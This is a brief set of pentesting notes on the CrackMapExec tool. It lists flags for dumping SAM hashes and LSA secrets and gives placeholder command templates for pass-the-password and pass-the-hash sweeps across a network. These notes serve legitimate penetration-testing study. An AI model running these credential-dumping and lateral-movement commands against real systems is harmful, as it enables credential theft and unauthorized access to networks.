KCN

Kaldei's Cybersecurity Notes

CRACKMAPEXEC

A swiss army knife for pentesting networks.

https://github.com/Porchetta-Industries/CrackMapExec

Resources

Workshop CrackMapExec LeHack 2023 Writeup - BOUYAICHE RAYAN

Flags

--sam
Dump SAM hashes.
--lsa
Dump LSA Secrets.

Pass the Password

crackmapexec smb [TARGET_NETWORK_ADDRESS]/[TARGET_CIDR] -d [TARGET_DOMAIN] -u [mySamName] -p [myUserPassword]
Pass the Password around the network to find pwnable machines.

Pass the Hash (NT)

crackmapexec smb [TARGET_NETWORK_ADDRESS]/[TARGET_CIDR] -u [mySamName] -H [myUserNTHASH] --local-auth
Pass the Hash attack (NT Hash) around the network to find vulnerable machines.